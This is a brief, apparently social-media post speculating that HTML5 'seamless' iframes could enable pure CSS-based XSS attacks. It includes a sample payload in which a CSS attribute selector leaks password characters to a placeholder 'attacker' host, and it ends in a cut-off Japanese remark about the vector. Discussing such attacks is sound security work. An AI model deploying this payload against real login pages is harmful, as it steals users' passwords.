pure css-based XSS attacks ?<style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=”login.asp”/> HTML5 includes "seamless" iframes could allow for pure css-based XSS attacks このようなベクタがもしも近い将来において実現するならば極めて</iframe>…